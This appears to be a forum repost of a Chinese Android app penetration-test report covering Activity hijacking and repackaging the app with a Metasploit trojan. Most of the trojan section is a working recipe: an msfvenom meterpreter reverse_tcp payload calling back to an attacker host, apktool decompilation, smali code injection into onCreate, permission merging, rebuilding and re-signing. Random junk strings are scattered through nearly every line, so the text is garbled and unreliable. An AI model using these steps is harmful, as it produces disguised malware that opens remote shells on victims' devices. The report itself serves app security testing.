原创-app客户端渗透测试报告之反编译捆绑msf马二次打包以及active劫持漏洞

admin · 发表于 2022-6-8 20:32:44

. y2 q& O9 _( N. n5 A8 I) x M R3 O! Q W- k: t/ D; q5 H
/ V3 k* p5 X5 }/ d0 y7 Y. H6 I7 H$ |8 q2 [1 H; Z9 t6 W

% N& }7 s5 d1 x/ P' C& |5 @2 x" W9 M8 p; X) |8 e8 i; j 文档编号： 2 }" _2 ?# Q$ H# B * C6 G0 @3 X! [/ g v4 N9 |

2 Y2 B6 J0 s, ~3 c# G: |0 r9 b! A R( ^% [6 J 9 o, j) G5 y; R! `7 F! | . {+ H& L1 T' r- ^' b4 k/ w

3 |6 i+ w* ?# n. O! m/ y( ~/ R . B+ Z6 w" C" v! y3 ?. b % k4 c: d" B: v' Z7 W* |# X& @* B& U9 L6 e7 f* A$ W% L9 ~

" t& M0 `; `9 g) ~2 F! n8 q( N4 P d% ^9 f* u 7 B7 C/ ]4 f4 l 2 `/ o- m0 u! Q* O% u

! F& {; f( h* Z2 _3 Z7 i 6 @5 E7 O# u s7 a5 e3 h! O* r * M* p) u+ C; b. }$ o# B. I ( V! l1 O( \1 U8 N* L0 z- T4 |0 R

2 \( H# q; x" {( V5 Q " x* J8 X+ |& z ; W6 s) l% d/ i2 Y, I$ G1 Y4 O7 M( V. Z: ^# T2 ?7 z+ v; p) @

+ S( @: O g# r$ ^6 g, t0 e3 a8 a , f7 V* d8 h% y 某某某APP渗透测试 1 z0 Z6 G! a2 [! n . W0 h* M2 L! A

7 [! R" k3 A) B) T. ~1 r 4 y4 V- g+ i6 w- m 0 m! c: w. p# G* }. W; h4 c : f5 W' ^. v9 W5 v# u' s; j

' Q- R/ m Q. Z9 u" ~( D ; b+ t- Y! l! Y - X' A# L* B$ E6 e$ b2 `) {) H" D! ?- k+ }

7 y2 E. G0 O" w# @4 { : d# ]4 [$ R( \3 `% F. z) C 2 w2 Z/ c' z- d0 t* t z! r9 ]# r4 U0 I1 Q5 R! Z( c

5 i- i4 I' q2 n, ~# r 3 S5 f( ]" t# Z. a) s k, x 9 r0 T# `0 C3 c. @5 Y8 L& _ 6 }6 T/ u7 |5 i5 Z4 ]

u1 F' k, p$ w6 W% b 3 X. M; I/ }$ S5 T& b 技术报告 : Q0 h( [* U& V2 ~0 G ( t6 K; k4 [3 Q9 _% F

; X" [3 M2 q5 Z# X9 O& O! H. `6 [ 4 A* z/ i) P* I3 H' D9 O 8 E4 G3 H& A5 _) G ; P$ _( W6 x) x F

7 L% A: v5 Y' n- b8 b! K * h: _. G" Y) C7 z/ n: K + ?: a7 f# T' A1 L* c q ! o1 M" q: ~( W! P; ~2 g

1 Q3 m! F d+ v3 s * s6 f6 z* S& I $ q2 ?& E1 s! L% ~' f( R 1 @7 p: {( y/ S& ]

" f! y G. j. L; G; F1 B ) P0 F( [, j9 |7 w" K 2 a9 I! M" v8 U 2 V2 G) t# o% l$ o5 N

# z4 R: x k0 E9 |0 Q# B : O; l4 f) r+ |# L* \+ D9 R , i( {( A! S" n& @1 B 4 ?# k( x* p1 z7 l' x) c9 H

# ?/ r1 C; j v/ @ * k3 F5 m; J, |0 N- ?! s H! H 8 R) X$ ^" b! L4 ]$ G1 s* B! @! S - M6 T# U) M n" [* J

; ~6 Z& j$ a* |( D ; I; ^ v) u1 {5 M2 y3 H 6 O! l$ K' v- D5 b+ G9 f! } , K2 f8 \8 R: d- D0 O+ ^

( N- P1 @; V P. `" L: H2 e8 B/ r& e' c+ m - t! |. e2 a& P3 U6 k * F% G' s7 ^/ |7 s

5 @# e7 Z) S. u S# d3 s8 I* n - x# R$ q# E2 Q7 f/ S 9 B7 m6 l5 B9 l! z( a6 M # g* b- `5 I' T/ V0 m

6 m3 o! M; |4 ~7 m ! y; [- [" s# X. o. u% h$ ] , C' _) h6 C4 h / C* w/ ` D. W1 f; m

! F5 t" G7 p, ?4 S0 H % P" v/ p! O. C9 w5 P4 J7 m4 N ( B& T8 c E% z; E7 l # O! L; U7 H$ j+ h$ V

1 Y9 ^% \ U! h: g2 m; ^ 0 i- \. v. g4 p$ ^! T " ], R8 @8 m l8 x4 M4 \. K% P% B6 X# u8 N$ a. j3 { M: C

. L! ? f# j; z9 T* }+ R$ E ! M6 R, y. ~% G# s 1 P* w. r: D7 d( O& t X2 G9 U: B8 |! w2 `; m5 ?- Z, r- u

- t" ^! I, X' V % c" Z. X# k9 q8 Y; \- y . }1 V0 o) G0 d) j+ L* [: L, a# o# b' O2 m& t# `

* K# ^% k. C6 m 2 z2 Z$ X2 A: | 2 ^% d% `7 z; u; S/ W 2 y2 Q$ o* r- i# G

+ M- @4 ]) s" U2 I0 q0 W9 U % n6 e6 R0 y% V. q3 c$ A7 ] 1 j9 U. @8 j4 o9 f D: m$ x# L6 B$ @0 M& r& v

( s2 P R1 p+ Z$ K6 o1 {! { 3 g+ o* \, I; V% d& s - m# ?) R, R% v4 a2 | " j: g+ @. a5 ?& _9 s# W

5 a9 k& T" ^4 p+ ~! c ; O" \ \, g' n' R3 x5 j ( f( s; w' B7 X& x+ B * i" }' T K( T' q4 Z0 H# B

* Y& \. O% L% `. e9 q & R4 W- n# o! k6 N4 h9 k 二〇二〇年 9 u/ O0 |" ?7 {9 V6 ~! X) g ) y: t4 W6 p% Q* }6 s2 y

" g4 p' A8 a; n+ C9 B( f 4 O0 W, L# G7 C) I7 F9 v 目录 # N6 M* T. k2 e5 @ V8 R / T! ^+ y, C" x: T, a* V3 f

6 ~! W9 k: r$ O4 M/ N 5 r0 ]/ M4 z% w% ?5 D- f, [: S : `$ ?+ n$ h" Y/ f) O: ] y8 c! X* a; e0 X3 a7 J2 j* v

: p3 X, c& ~7 r! u3 D1 {+ {1 X 9 P% N* o) _( T/ d, y/ k 1 概述... 3 3 F" q+ c# h' c+ ^+ X8 Q : g& K4 a& ~( z3 B: C

& n. d" ?" T, p 7 U- \. v+ `! A0 ~0 l4 [8 n, i 1.2测试时间... 3 ( Y2 l6 I6 v+ o, B9 X# | $ M7 \0 S' x+ y

2 h5 p5 ?- x8 J: g- T, k3 @6 ?! F$ |% R. n& C4 X. s9 O1 @2 F 1.3测试对象... 3 5 z) C$ Q# y3 T, J; {' m 5 ^: B6 W. j5 l

7 D0 F2 Y a3 h; r' ^4 ^1 r; ?8 U2 f: c) k# K& y O- B0 S 1.4测试结果... 3 5 e `' M+ _+ V+ @# l! Z 2 e, S9 d" d0 j' U5 j# Y

+ P ]; P5 z' k" `7 A, _6 | , F: n; M9 x; `# z, ] 2 检测结果... 4 ) y; E; {3 M: V. b , p, y6 ?, ]2 _' Y

2 Q; }7 }# G9 o. R' w7 Q, u e7 g% u/ b H( a1 w 2.1 某某某... 4 & L0 K; @0 c/ L. R, `: Y1 e: h# r/ h6 t1 H4 T

7 o0 _% d$ Q" p - V; q5 c7 ^6 e) Z* H2 [) s 2.1.1检测目标... 4 ) E$ b G- h" ]2 J6 M( p, p " F5 v3 r2 y1 }1 O. ]8 |

+ @7 [9 N+ G/ l. W p: U" e% y ( E' `' Z, M: t3 [ 2.1.2检测结果... 4 & Q, c9 S) f0 |& Y; f$ o5 o/ u; Z* ]4 h$ E; b

$ \2 F( ?3 h* M* O" G, n/ U6 U/ g ?0 D; p5 d8 S4 [6 L2 [5 q 2.1.2.1. 4 * i- q3 R$ Z' f. R: ]5 v0 W ! m7 C# q, j3 G- }8 {) D

`1 O) i9 f( A4 [ # C" G6 p7 d2 o- T) l 2.1.2.2. 6 2 y2 ~- d( ^/ Z$ W9 q# q# @# q8 Y5 E ( ~1 h e2 N. r. K9 X0 L

! A/ V8 a0 `/ p* F) {! q 7 ^4 \5 g& E9 Z; a; Z1 u . X6 k- I& ^; } 0 m, c- V5 ]! O9 @3 z. x4 s) ]

/ F/ P4 U; i K) P+ ~ o: B 3 m3 K" e2 K" q 1 概述 & J: `8 a8 f4 C ; |( ^( S" ? \) C6 F

8 d: q, D& N! p! H# J * J! \$ b6 k! e3 H 1.2测试时间 # x* @. d) {' u8 A: A, w+ o8 i $ L: Q1 f5 X5 n5 h9 y; R5 M

`* k4 }/ T0 K5 D, V9 r( J 5 V/ N" l, T2 ^1 E0 _ 5 @, H) X; v* \|' x" J- {: K9 `; O) A7 l+ H4 a6 X 渗透测试时间 : F5 j) Q7 l6 w- ? $ h0 M% e2 W i; { 2 b3 Z; H6 K! \# }5 T0 ]% T ) d, o' }( H! j+ o; H0 B
0 N" d6 d# p' O' {% x( E! x% ^: b 8 z2 Z& v! z$ g) k% R- F 9 h3 N% [& q3 e8 J8 S$ j/ `! X3 ?+ J: ^; g8 e( T0 E; c 起始时间 ; N4 h2 W& m4 E6 ]5 T. E3 W 0 }! f/ H1 S) a) }! s# h 9 Y5 o: x+ W& y) v7 W Y( l& f0 N	3 H$ w3 [& _# e" b8 B * ]8 n. X5 A% Q" U0 F! r8 m [: i) I$ Y; m( g$ f$ Q7 Y' A ( v! O0 H8 D1 m0 v 2020年4月6日 0 H5 Y& j7 T5 m+ T9 \|- {0 ^" \|; H& r0 B/ M2 y 6 t* ^: T4 S! l c, n" c) T W& H6 M $ x1 Z1 s; v6 e: i
$ l" n4 P: b5 \|7 c5 v. w4 @+ { 1 _- @ e O" L: a4 U4 h5 T / z) t) Y$ e+ b, g0 z9 K* I% Y2 Y }: c 结束时间 5 h' t: Y) G9 i* q/ s5 h) l( A ; Q' E7 k0 Q4 T S. @7 U3 W 0 Q3 V% E) J7 c7 S) e: v- y, A# U% _# i% p	& \|$ \5 O" \|. q, j+ \|' X" o+ U ; Y' i& B7 ^- x. t! _ - ?% t2 e* L' l5 l7 H% o7 I$ P( o8 a# p( x* W0 n% d8 s5 m 2020年4月9日 ; z3 H! X) f& p% a) a$ r) c$ L7 _4 {6 V$ l1 Q6 E3 B1 G( V8 f 2 ^& K. Q' R: d" H7 ^6 Z ?9 Z: }; d: r. R6 Y

+ B& [$ B7 H: } X; o% }9 h+ G0 U* E+ C! ^' N& D1 n c 1.3测试对象 ) x: j" I/ E# }0 W% N& v" y8 r2 _, ?

0 A+ r3 @& Z* e+ v. E/ q! \% h5 e1 w$ `- b8 Y! y 此次测试目标为某某某安卓APP进行渗透性测试，APP存在安全漏洞数量如下表所示： ( d3 f. b+ \2 O2 F$ Q8 S) r U4 K ( Z" x4 v: ?: [7 g9 L* C9 C/ W# {9 m

/ D/ G6 c* ^+ ?' u1 F5 v* @' @: _- U; v+ r/ p 表1-1 检测对象 - e* _: A1 M. \; S4 z' B# R( w* \+ c: u; T- o

% e" F" f% H! D r ! Y/ Q+ b% F2 A * O$ t; ?5 }4 w; }- w8 h. J4 ~0 E: e) V 序号 9 w2 }. k# j3 I; A9 } B( ^2 n; O' O1 H" X" \) ~ 0 f d7 }/ k4 D ~( d* K $ x- \|8 M( G) [; I. U( u6 n	: ?: M+ `$ ^& F) W $ Y4 Q& g" c# y1 W + \' l6 w) C) t6 \5 C/ G" c( n6 h% d ; n8 X3 U7 b9 `6 n 测试对象 ; q; `/ Q1 }) d( @ t- L$ _( ~, R! C1 h4 l2 e % ]+ b! R5 l8 I: t+ n& S " @- d# l: O# q1 o) B- F	5 L5 Y; \$ v; k$ [& E! N3 ?: O% a/ @' f- V 2 I" G7 ` D: m" z8 b5 Y( T$ c " ^3 d. `. K J: W. U 测试地址 8 W' C2 n$ d, C, T* H/ } ! i& \0 \* c* r: M & Y1 q7 K. B& ?' G R9 \* o3 Z' e 5 P T, R# V7 _( L	9 \( H( v, @' n( a# d( a, s5 @ ' x# r; o5 {- S* L7 w$ E 7 ~) n; G I+ _) O! e5 g$ D / }' P+ t& `9 k 安全漏洞 ' O" i6 d) z2 M2 R3 [3 @+ N 7 X! \+ o$ R! D7 T6 I 7 C0 p- \|! ]/ o0 @ {2 p ! H4 J) g+ I0 f3 ?6 S4 C; F, f, M
0 ?$ ^/ q% p2 y J0 ?. N0 n 0 z4 @( ]8 p; U5 I4 Z; E * F& @$ @- o( \/ H: s! ~0 G' Q , d' b, b. N& ]4 m0 U# E" q 1 . D/ J" M$ n q7 t 3 }7 v: M9 {* M 7 [" o7 _9 F; P" K8 ^ / V: i% ] w; I6 E. C+ o2 f) u	) i) Q" q6 f; G( j5 Z* w* q0 E " r# v" i, g7 y0 x& }3 {/ G ; {) K: i2 }! M4 f+ D# z 1 Q$ A) O( h o1 t9 J `: k$ v- U 某某某安卓APP - `5 l [ }+ T3 s' v. h, ]1 c% } ~- W6 ^+ w% ]: l# {+ J0 a& ~ 6 r$ q$ j- U; Y) W " O# `, Z" G ^! I; T	% t) n2 l, T+ s+ z- H 3 w# F0 J7 h' v" l; { 8 f) C3 @& r8 m1 T5 ?% }# @1 z , q' c" L& v7 v5 K$ J 2 `- T, d/ k: E5 e8 H $ k- t% M/ J4 D' Y 8 S' h; m: _' b: \9 y" n* l- \ 3 D8 X; `3 E( n) f	+ G0 p" C9 n4 g 8 T5 P- ]4 ]5 T3 s; A/ X; ^* J' n " D$ w3 c7 r K- c/ r ) x* g- \|# `* M$ {1 m& i 2 5 M0 O8 a h- _; j! _ S( z8 D) g x- T : ~% y1 W9 ]3 x+ }- m( o. @6 D / \|4 \9 w" U( `

- d: ]6 v# H+ n& P2 W4 v% I ) H4 h8 x" f; z) Q 1.4测试结果 ! X- O8 c9 p: f6 B. J6 E ^6 M. U % i/ E$ u) _8 |

7 ~# r: n2 v- \8 x- ~/ M 8 d% \. h$ k4 w5 D; G" [ 在本次对某某某APP透测试中发现，APP安全防护存在一定问题，主要问题如下所示： / A2 M3 L# y4 J" K% ?& i9 i! q; v1 Q! f/ r" U8 Z: x8 H4 j

$ g. F4 W, f% V 8 _, s* B1 O. K: C6 ~4 @2 M& ]' I( @ - y; H& \; f% u, _8 S. a( w' [" p& i9 \

% {$ s0 d: b4 |! z : n. ^% D4 i C W* [$ Z ^; N! q 序号 + V1 O' l, Z! D% H5 s! a5 k . D8 {! R" u' x+ O

3 O; P& }: B: k+ d6 |1 R4 f - h D% v' a# B( U( s 系统名称 - L: P: a& e: B! a" J' b, T 1 ~4 ]/ v" D8 i9 S2 Q- T" |0 h

6 _7 |/ V2 R n - r! K/ J9 d# ?7 y, | 漏洞名称 ' i! p! R8 m ?* i7 O O' W' M* q; A8 k' p

' x4 K7 |, l& m/ U7 h2 p: C, M' e6 {/ x ; J4 V. I8 i) n: w! n7 j 漏洞危害 3 l6 `% p! `- f / j# ^3 J5 e) A9 C

! q2 e% a. Y- x5 N8 E6 w+ e, Q+ m * O2 M$ E( L' Y v, A 修复结果 5 Y# j& S& p9 ~5 h5 B% { N! z0 k1 b% X' A: l! i

3 A3 K% ?+ d; k2 f( R1 e & d1 _2 Q+ J+ J* |! } 1 8 G' _4 n; B7 h( _0 Q' i+ Y, L0 l3 K& [! y$ D i f, j, I

- U0 ~4 _! b2 g' F9 E3 J 7 z4 ~0 o! d7 Y; N; G- E 某某某某某某APP 9 m9 n# g9 _" L1 [% s9 f2 a# R/ s) z, S6 D1 D

4 b. F2 j/ Z7 M8 i& Y% D3 f8 v# g 9 A; _, a9 E- \. \8 Z% q Activity 劫持 ' {0 b) y. @9 Z2 W- Z. [" L, H' ^9 Z 0 @) j8 M' d0 F4 c

# E k! D4 P0 ?8 b3 F7 Z ! q% A3 ?1 A9 i% R! @ / [; i \9 m9 u5 q. o 0 Y% i+ P' q/ }% J3 _

+ R) |; X/ _% I( T- l1 Z9 x: v o , u% Y) V n7 g" X4 w, } 高 - M( n) z) _0 `* N; c& n3 } ' S; O) y! I l* q

% e; A4 c0 f, S) G3 J5 `% c( [" n% d; ]0 y. T( C% C4 }& q ; M4 i0 v6 F- z4 y7 J( c& S 6 a6 _0 F7 g$ `6 D+ }- u3 o9 [ b

: |- ?% ^$ K" h9 e6 d1 s9 x1 C. q" p2 v 2 ) c( m5 @ ~. k$ B' o 1 \) m0 y) o3 [

: m) ^" U" D6 O+ H/ z7 z # ]: |+ b8 h; C1 b3 C$ k6 e 某某某某某某APP " v! }* Y) _* m) _* M 5 v7 E3 o6 V5 t: r2 Z: X. `7 g

2 M1 V! R" y; r, m# |7 J& x. h Z, w, v( @3 F1 ^# M0 u1 b2 Y! [ 反编译二次打包捆绑木马、篡改APP代码 2 z! m, {3 X4 R ~$ _( f - {; Z# n' D/ h; _/ F/ p" }% ]

, D- R% S8 O3 q- y: t 2 u, {$ k- p9 v, f: y0 c1 j 高 ' R! w. e3 {( g" Z+ J $ `- B- [1 j$ X" O4 {- j) X6 f

, Z+ X9 A6 O$ h* M0 K m& l' w- q# ~) C9 P5 y* V7 F7 p0 p 8 U S8 Y8 \ p, a2 s 2 H( |# T; X% g ^% v9 d" e+ k

2 O1 r+ S8 M2 |6 n3 S 1 H' g, m1 X0 F$ w ! Y& G$ N# k! Q& v 6 c& F) A5 A$ ]5 | s2 V8 I' W

; h* b; c5 L- d1 W0 A: T * o g2 [4 R% y 表1-2 测试结果 8 P _: L5 q# ?7 M8 d) r n8 y+ X @+ h0 y+ M: }

/ Y5 L* \7 z- N/ c5 w9 O; x' U ! n! }4 @) s/ _! ]' E4 y ) E6 m% y4 @4 E; X8 T + u6 @+ t* v( Y

0 k6 ?( i/ ~/ u$ L+ W' Q # J& D3 u+ C# Q$ X" x9 Z 2 检测结果 6 y) A. p; t, M* L 0 H. u f" A$ c. d- F3 g

$ l W2 K, k8 P; s6 G$ k _0 f1 B& c% ~0 x 2.1 某某某 7 E1 N' C7 [1 l. g' t6 B* V( p/ V: h2 V) S# U+ D! |" ^

' q6 u$ _, h/ J S9 E0 ?0 k( q . o3 z" j% s) g! D8 o 2.1.1检测目标 3 N, x1 r4 D0 ]! x ; W- K6 l6 {+ i. q5 x1 _/ X

. N0 I! F# E/ N1 y4 S6 i , P5 R) f0 s8 y, o7 | 目标地址： 某某某某某某APP & L, C+ u C; h F- o8 c- h( P $ w( l9 I& W7 b; O# @

9 f, c& _- o* g4 U0 I6 d; r& D; H w) x , u6 ^ h. x- _$ z% X Z2 p. [9 f: q. w 2.1.2检测结果 / f. Z# |4 P5 t. K- N1 u$ e % P6 D( k9 y( {& E& @6 W! Q9 \

0 j8 H4 y4 a6 m) z; y9 i, R8 R ) D& t9 @" u' g4 x 2.1.2.1 * Q2 a+ T2 _% _+ {5 F7 m6 K; `& T d, f) i' K1 O, B. }5 d- h

5 Y, O7 i; i: X+ n3 ?& z- @ . j+ |7 T9 g, f; t G 漏洞链接地址：某某某某某某APP 3 C9 r, N" w6 ^: f8 H% y4 c / {; r) g7 ~# D6 f2 C* S- k

* I: N8 x. k- g0 g0 h2 C; R: p# s/ e+ Y& Z" c4 M* t6 H. O ( i* J1 l- ~6 C, _& ~- A; ~ / R- i w$ }! P

' p; Q0 V- p/ |! l! g9 l" A 5 e* U3 J% \0 q7 ^( K; h 漏洞分析及取证： 1 i9 G7 q- T5 l6 O( k8 K ( G1 |; {* I, M, l2 b

o4 S9 @3 r, G: E1 e; d2 q; T3 D8 z& d( L 通过androidkiiler反编译，发现app未进行安全加固， Activity 为com.minivision.cmcc.activity.SubActivity可被劫持，复现漏洞如图： # k! C3 h) e! G % t6 ]) b8 x5 R3 t/ @' |

: a4 n( ~$ T& B 0 N! t7 N( X/ Y& q % \/ M$ k/ a% N6 X1 u3 l1 z+ z- l0 c6 J! c( R( u1 {

$ N6 ^3 Y$ C1 M0 h / j) L t; M) D, c3 g/ Q9 C/ q- b ) i" J% d/ {5 m T* g) F1 \: A- V7 ]

: a4 D* J5 ]- V# ^9 r " Q1 A7 j, j7 b- t6 I" @ + I) q! J: L; A $ o9 Q8 F$ r1 }- x( ^* z0 |

! p! |0 G2 X5 m# L; x9 S+ K' i 9 ~$ u2 n' G I# S4 \2 o& O( d3 s & |0 p3 T5 T6 g" ~ / ^* o) n% ~# ]5 y3 { Z

* P0 ]8 k+ @$ a5 t 2 n' s) w) h0 ]5 G5 U1 K+ h / p7 P. A2 G8 [+ h% ^ ( H9 i& ^% j- e2 m

% b! G: w. b' h6 M 7 I) }3 `, C5 j0 A5 z 漏洞危害：高 8 @& @6 q, u& ~" u/ E9 [ E; J$ i! \2 y6 d/ S) V+ ^

1 v( N$ I8 A/ g, q. \! o; T- _ 4 @3 `% ~ g4 Q2 X1 Z1 H ~ M: l% Q ]; J& x h7 H& b 6 W8 R8 i+ r; E: R h) c 严重程度 $ K4 P4 B7 w& L9 d/ Y! ]3 _' L 2 C/ g9 J& b* \$ U$ a9 a. h+ S+ t1 r. N V% \ 5 y3 @. P; k. C F! O7 e9 Y1 T! K a% i+ K	5 ?, t: w) K: {! f# S5 u $ J: Q. g' L" V% A$ c$ F $ [0 ?+ G5 R- Q1 w4 W: N p/ u/ _5 Y- H8 A; c- Q! ?# T 高 3 ?8 b7 G9 b, [* w6 E/ Y ) x. q& O$ f$ W # K. \8 m' Y$ \|& z3 Q6 f3 q( E9 J/ L. w1 k* a3 s, T	$ K I5 n' t# ?1 p6 U& ^' I Y. J6 X) `/ W/ K8 \|2 J 9 m2 ~+ O' ~7 {$ M" w. L, y' w * k" }% [7 o6 r; b8 r0 P0 H& a0 j ■ 6 \|9 X9 l _5 k) L1 z. H ~ y: Q& t3 ~/ z$ ]) A ' Y5 l! f. T) t* N& _4 b" A 7 E2 k6 ~5 {$ b* M! r& ]	( i0 F2 s. l% e1 x8 ^ 4 M4 T; _" i; P& l$ x9 q " X& l7 j% W# g$ ^" a# E / Y$ \8 H) D7 {5 g9 a$ ~8 d/ c 中 ) F [9 i1 _* n2 } : t% `) @0 \|, f# s* v1 ?* Z & L" q- q4 `4 Z4 h& S& t. G7 P; p( L3 ]% `$ `& p, N. o	1 N* [4 I9 J: `: ^& f & \|: Y0 P* E3 {: G3 K0 c 5 f- e, [& {/ }; j( s0 X8 _$ _ o% d6 x7 U * N5 W1 Q6 j b1 }: C, f* w 9 c& g) b/ [' G! Z \. o. T. i : K* r- c+ ~; Q' K) a6 d( M2 \. W	# a) I" d, w2 D2 X+ [5 g9 }3 s/ H: g( x& Q. \|9 D . Q$ @- c6 b8 U1 s ' H% L& Y( j! e. W! F D- Y# M 低 ! f F, i& K) j - F, E3 `/ ~. W4 z, V! g ' g W1 ~' w0 @ , k4 g7 H' d/ I( W( \ R8 [	1 p* J+ Q3 _4 K- R/ R/ x, ^7 B* i . W& X* w- o" x 2 u; U0 J( H; E6 w% s; `3 ?. W7 L, } R. k$ `% {& @# V: m2 b2 Q; v5 z \|* w# u9 D4 `+ P ! x8 B1 E o8 E5 N9 j6 I ' B' p9 g3 e; R) h( ] 4 H; n F4 ]+ t

) S4 g5 t* D. R+ B% X! E* _7 K+ `& E, V& b ' O8 e! }0 u, P) J/ D; z; W 0 ^4 N+ v! q/ n+ e+ m3 i; w2 C

( L& |4 X) g; A# @ % P% f4 t6 ]7 v' G6 v% Z 修复方法：在 APP 的 Activity 界面（也就是 MainActivity）中重写 onKeyDown 方法和 onPause 方法，当其被覆盖时，就能够弹出警示信息。判断程序进入后台是不是由用户自己触发的（触摸返回键或 HOME 键），如果是用户自己触发的则无需弹出警示，否则弹出警示信息。 : ~# R/ w4 q( a: z . W0 k! F: D3 L+ b+ I

. o0 C+ p6 M: `2 p9 {' |" H+ c 7 N% P* _5 W8 O- N4 a% A8 J ( _: b( ~- f7 Y9 w & B6 a& L$ g- h" D( p L y

2 m ~9 S0 D* D: o1 @- ^ 6 C2 x0 D. x9 |2 A , |$ v; k- p$ O' u9 Q `( _6 o/ S& m

: d, U9 L% h8 g$ m5 t1 W / Z+ o$ K. G& }: t# e2 s8 f 2.1.2.2 6 z) j; g u5 B4 w6 @( }' R6 m 6 H# H2 S" I+ H, d2 X: |6 N

) X! q; a/ X0 Q$ S9 \ G ( u0 x& ?0 N% d2 L1 b 漏洞链接地址：某某某某某某APP 1 J1 t# O4 p$ @- j1 N* ]2 n; b4 ?7 S- w9 D, I7 j

0 `, V: g6 `6 E7 ]; }9 n7 z7 Z3 } $ L4 i8 |3 |! s 漏洞分析及取证： 9 l& v. R9 `- ]! B* h' t5 o 7 K/ y2 J, h M+ L4 v

- g3 s# S* V, n& b4 {% G% K4 c5 f% o m8 a6 v 通过反编译，发现程序未加壳加密，可直接反编译获取源码，经过测试可修改app代码捆绑木马或者植入广告等操作，复现详细方法如下： Q! S4 o) N2 q' R0 d/ L6 C3 e" K: Q 0 R* ^8 D! Q h( L+ }

8 q) c) q; T9 g& {0 r& J& T9 x+ i6 X8 H & T0 p/ C! n/ \" ? 用Metasploit 生成木马 apk 4 i5 `1 Q7 I) j; h 3 u5 M4 r" w& X( U# G

g. x8 }& ]$ ^6 S ' s" K4 H7 s2 I% I7 S9 Z- w2 S msfvenom -p android/meterpreter/reverse_tcp LHOST=192.xxx.x.x LPORT=4444 R > cockhorse.apk # s- u5 @ V/ [& L7 u' d e & z: n) X T0 N i6 i

0 X+ c: [# X, P# K t: H0 A0 J) o! ?3 f 反编译目标apk和木马apk 1 n! p5 V( U, }0 S4 Y T * h7 S7 M( s' d

1 b, i w- ~; x) f1 G 4 r! y% y3 {4 i9 F! o apktool d target.apk
& q# `8 t( S9 h; @! b- _# O: \ 8 c* C) M" L5 P; Z, B apktool d cockhorse.apk 6 V5 S5 @9 X7 h1 N, I " n" k: W- O/ h+ a# i+ k1 S

6 P) X1 b+ H& ~* j) ~ 6 M, f' | Z% T9 I6 ~6 j, v 木马 apk 注入目标 apk . s) V6 m3 ]/ ]( v: C: H0 Q. L . \8 ~: C/ Y3 ]' a8 ^$ |

3 J; r0 N- d/ X8 J" i 0 P9 a+ t$ s# b5 V, r' }9 L 在目标 apk 反编译生成的文件中找到启动 Activity 的 smali 文件，并在 onCreate()方法中添加如下代码：
! z6 d* o5 `' [& c3 b+ t: H1 c! I; ]* {# z, t# M( u invoke-static {p0}, Lcom/metasploit/stage/Payload;->start(Landroid/content/Context;)V 7 e+ u) f8 p2 [7 a3 v ; Y8 i* e0 S& g; X+ i& t+ i- z

' B. N& k$ r3 E9 r4 p # N! @! P7 P0 m1 f 将木马文件 AndroidManifest.xml 中的权限放到目标文件 AndroidManifest.xml 中，去除重复 4 Q; @7 F, w1 K 2 V8 x% f) X+ b8 f5 G* H

6 ?# C2 R& j: X1 O& W3 z' }: v4 T/ I/ U7 [! ` 将木马文件的 smali 文件放到目标文件下，例如 com/metasploit 文件复制到目标文件 com/ 下 " x+ K4 O% W& k3 ~) }3 `; U% t$ D5 s4 i4 T

: r6 m$ b7 ~" R; k7 o ) z* f2 w5 R' t: N' r 回编译生成最终 apk + l7 q0 s o, P , X5 C# s; x B' m6 @0 ]+ ]

% h7 C; @1 Z; d. @' V. H: Z 7 s; H& n6 ~6 ^% Z 重新打包 - @; s. J# l7 i

! d- u7 s- z; O- Y2 x }" B ! R6 w: d( P$ V( o4 c4 _' P apktool b -o repackage.apk target_app_floder 7 y7 p) k3 h6 [& z9 e1 { $ L1 B* A. l1 b) C+ _, z) t, `7 j$ C

7 q; L+ Y- Y/ ?& o3 p " j! \' v* u1 Q* J8 z7 B: m 创建签名文件，有的话可忽略此步骤 : Y p0 b6 B7 S3 Q$ f' O' f8 g- m) l- i& q

6 } `- n6 i1 G5 D - S" `# x6 B8 p0 _$ w" W keytool -genkey -v -keystore mykey.keystore -alias mykeyaliasname -keyalg RSA -keysize 2048 -validity 10000 ) l; L$ S b$ t0 y# B- h: W& A & b! d0 p7 [% m* o2 J

" E7 d" o* R, d# |& N+ m . E- g5 T$ `+ x0 x# x2 m7 r 签名，以下任选其一 7 X5 P8 i+ A* _1 u9 D% z 7 s- S0 n& }( e/ H/ Q9 ^2 k- |% q

% E. m) t% O( i) _0 K) R; M( A * s7 r# s" L! J jarsigner 方式 $ u! ]! n3 t. Z) d5 T9 [- J& \+ d# v2 i" L6 {" [

, @, a) L- {% W 1 C* \& x! S6 `% _ jarsigner -sigalg SHA256withRSA -digestalg SHA1 -keystore mykey.keystore -storepass 你的密码 repackaged.apk mykeyaliasname 3 t W( H9 x9 B, ` 1 L/ g8 G+ r- S7 G9 r

! Q ~# G+ ?' e& G; { . q: G" X7 b3 E4 L$ ]- L- D& v- C apksigner 方式 2 N% o5 d. O/ U, Y! }" T( E* C) c+ Y- ^ a( T# @# B4 ^. d7 g

( o! u* r' O" j8 f0 B$ s/ z 2 G9 v# _' {' l* m; t9 a apksigner sign --ks mykey.keystore --ks-key-alias mykeyaliasname repackaged.apk 9 t4 p9 t4 H7 j& Y# O 6 J' W* ?) R: P0 M! z4 u3 h" I

( I8 E- g/ T0 s4 x1 m9 d6 f1 w) ^+ E, `: ^! W6 m 如需要禁用 v2签名 添加选项--v2-signing-enabled false ; G A6 S+ C$ \9 B1 n8 N3 B, ^1 }6 J" W) H' b0 G* ?

2 M6 L! n) [ |, O6 |4 B2 @% h3 l ! h% [: ^+ A7 h' A s6 C( ~. H5 d 验证，以下任选其一 n* |0 |# V0 r4 [4 G1 N! K! @ / D' b" `2 J4 ]# @( D# g* i6 p

+ L( h( K! f: i( g1 q2 l2 r& F & V8 [% n9 y) k3 q% k2 |8 }5 C jarsigner方式 3 N4 q& f& ~/ J( Y, u; H T) {7 L* u

6 z2 Q9 q; Z6 L; s# G : u- p, t+ y2 R7 x- f jarsigner -verify repackaged.apk 6 G7 ^" \2 P0 T, Z9 y' { $ N- Y. i8 d" v% v

b7 D/ V2 a9 ^! j; z6 ^7 _2 ^0 T apksigner 方式 : K% \: N, @9 X/ n) ? - j; ~$ }& J; d# Y

) u; y) S# k! w. n4 {6 _2 e 6 T" Q. e( g/ C' z apksigner verify -v --print-certs repackaged.apk k) h* r& u. W8 I1 E5 q7 H3 z9 }8 t! E* M) G

& `! B H) T, k- f7 Y0 H. ~, f" \/ E( _! R keytool方式 9 H9 i7 Y% x* x$ ]7 g7 H ]& o0 j- T% W# R3 l) @" y# E

